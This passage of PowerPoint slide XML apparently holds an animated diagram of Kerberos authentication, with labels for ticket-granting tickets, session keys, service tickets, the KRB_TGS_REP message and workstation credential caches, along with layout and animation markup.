            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="5651819"/>
              <a:ext cx="1715503" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323229" y="5373216"/>
              <a:ext cx="2567940" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Workstation Credential Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="Picture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5776" y="3065461"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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939" y="4254546"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture 2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8493" y="4680323"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Right Arrow 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3109495" y="3629803"/>
            <a:ext cx="2502616"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en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>4. KRB_TGS_REP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>HOST/Workstation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Straight Arrow Connector 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4357936" y="1793064"/>
            <a:ext cx="718121" cy="15354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2051" name="Ticket Content"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5223390" y="334075"/>
            <a:ext cx="2247679" cy="2346131"/>
            <a:chOff x="5223390" y="334075"/>
            <a:chExt cx="2247679" cy="2346131"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5223390" y="334075"/>
              <a:ext cx="2247679" cy="2346131"/>
              <a:chOff x="3657899" y="705967"/>
              <a:chExt cx="2247679" cy="2346131"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="Picture 4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657899" y="705967"/>
                <a:ext cx="2247679" cy="2346131"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="42" name="Picture 4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013100" y="1017929"/>
                <a:ext cx="190699" cy="377609"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="TextBox 44"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4255264" y="1075490"/>
                <a:ext cx="1468864" cy="625812"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>Ticket Information</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="TextBox 46"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4247543" y="2176840"/>
                <a:ext cx="1468864" cy="625812"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>User Credentials</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="48" name="Picture 4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flipH="1">
                <a:off x="3945805" y="2560430"/>
                <a:ext cx="225134" cy="308918"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 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492989" y="1073076"/>
              <a:ext cx="311866" cy="311866"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="Picture 5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480530" y="1762155"/>
              <a:ext cx="311866" cy="311866"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="Picture 5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347672" y="1570075"/>
              <a:ext cx="189855" cy="278996"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="Picture 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333219" y="498781"/>
              <a:ext cx="190335" cy="279699"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="115" name="Workstation Large"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="185520" y="2490242"/>
            <a:ext cx="2756889" cy="3858211"/>
            <a:chOff x="185520" y="2490242"/>
            <a:chExt cx="2756889" cy="3858211"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="116" name="Picture 11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41725" y="2605440"/>
              <a:ext cx="2700684" cy="3743013"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="117" name="Content Placeholder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1369" y="5805264"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="118" name="TextBox 117"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="907022" y="5843464"/>
              <a:ext cx="1715503" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="119" name="Group 118"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="185520" y="2490242"/>
              <a:ext cx="2700934" cy="3253744"/>
              <a:chOff x="2920215" y="1645913"/>
              <a:chExt cx="2700934" cy="3253744"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="120" name="TextBox 119"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3042792" y="1867623"/>
                <a:ext cx="2567940" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Workstation</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="121" name="TextBox 120"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3042793" y="2110989"/>
                <a:ext cx="2567940" cy="184666"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>User Credential Cache</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122" name="TextBox 121"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3053209" y="4714991"/>
                <a:ext cx="2567940" cy="184666"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>Workstation Credential Cache</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="123" name="Picture 1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20215" y="1645913"/>
                <a:ext cx="566691" cy="526075"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Request Content"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3111530" y="3857261"/>
            <a:ext cx="2500581" cy="1948004"/>
            <a:chOff x="3111530" y="3857261"/>
            <a:chExt cx="2500581" cy="1948004"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Group 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3111530" y="3857261"/>
              <a:ext cx="2500581" cy="1948004"/>
              <a:chOff x="3111530" y="3857261"/>
              <a:chExt cx="2500581" cy="1948004"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36" name="Group 35"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3111530" y="3857261"/>
                <a:ext cx="2500581" cy="1948004"/>
                <a:chOff x="3111530" y="3857261"/>
                <a:chExt cx="2500581" cy="1948004"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="Rectangle 37"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3111530" y="3857261"/>
                  <a:ext cx="2500581" cy="194800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spcAft>
                      <a:spcPts val="1500"/>
                    </a:spcAft>
                  </a:pPr>
                  <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="TextBox 38"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3692408" y="4173468"/>
                  <a:ext cx="1671680" cy="1415772"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr>
                    <a:spcAft>
                      <a:spcPts val="3000"/>
                    </a:spcAft>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" dirty="0"/>
                    <a:t>Ticket Information</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr>
                    <a:spcAft>
                      <a:spcPts val="3000"/>
                    </a:spcAft>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" dirty="0"/>
                    <a:t>Session Key</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr>
                    <a:spcAft>
                      <a:spcPts val="3000"/>
                    </a:spcAft>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" dirty="0"/>
                    <a:t>Service Ticket</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="37" name="Picture 3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194617" y="3957926"/>
                <a:ext cx="351058" cy="573771"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 3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220279" y="4682786"/>
              <a:ext cx="380199" cy="375562"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 3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194617" y="5309147"/>
              <a:ext cx="472180" cy="312804"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Workstation Content after Request"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437863" y="3238199"/>
            <a:ext cx="2262853" cy="2161921"/>
            <a:chOff x="437863" y="3238199"/>
            <a:chExt cx="2262853" cy="2161921"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Workstation Content after Request"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="437863" y="3238199"/>
              <a:ext cx="2262853" cy="2087040"/>
              <a:chOff x="437863" y="3238199"/>
              <a:chExt cx="2262853" cy="2087040"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="154" name="Picture 1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790" y="3238199"/>
                <a:ext cx="327713" cy="327713"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="TextBox 154"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="910893" y="3263136"/>
                <a:ext cx="1789823" cy="2062103"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>User Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Ticket-Granting Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Ticket-Granting Service Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Service Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="156" name="Picture 1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7863" y="3678993"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="157" name="Picture 1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9417" y="4104770"/>
                <a:ext cx="348452" cy="348452"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="159" name="Picture 158"/>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50733" y="4616418"/>
                <a:ext cx="472180" cy="312804"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 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82604" y="5013638"/>
              <a:ext cx="386482" cy="386482"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71717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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">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051"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2051"/>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2.77778E-7 1.85185E-6 L -0.3033 -0.0338 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-15174" y="-1690"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2051"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2051"/>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50"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>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31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>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15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="115"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="40" presetID="10" presetClass="entr" presetSubtype="0"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2883573" y="1655743"/>
            <a:ext cx="2793531" cy="3848381"/>
            <a:chOff x="2883573" y="1655743"/>
            <a:chExt cx="2793531" cy="3848381"/>
          </a:xfrm>
        </p:grpSpPr>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6420" y="1761111"/>
              <a:ext cx="2700684" cy="3743013"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="TextBox 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3042792" y="1867623"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
